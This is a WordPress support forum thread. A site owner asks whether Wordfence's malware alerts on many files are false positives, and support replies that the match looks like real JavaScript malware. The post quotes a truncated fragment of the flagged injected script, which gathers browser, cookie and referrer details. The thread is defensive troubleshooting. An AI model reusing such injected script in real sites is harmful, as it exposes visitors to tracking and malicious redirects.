False Positives?
-
Overnight, WordFence found all the files on one of my websites as malware including core WP files, plugins, themes, cached files from WP rocket etc..
What is says is as follows:
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: ;(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var ... The issue type is: IOC:JS/maliciousAddon.B.10297 Description: Method to pass browser/client information to other malicious files.I double checked all the files by comparing with the original files and there are no issues or malware or anything. But Wordfence keeps alerting me to this.
This is happening in only one site. I have 2 other websites with pretty much the same theme/plugins and no issues.
Running the latest version of WP/WF and every other plugin/theme as of today.
-
Hi @spk100, thanks for getting in touch.
I had reason to believe this may not have been a false-positive as it matches signature 10297, which detects javascript malware. The sample in your example looks similar to cases mentioned by our care and response team in the past when performing site cleanings.
May I ask what action you took to come to a resolution to see if it’s appropriate to provide site cleaning instructions.
Thanks,
Peter.
- The topic ‘False Positives?’ is closed to new replies.
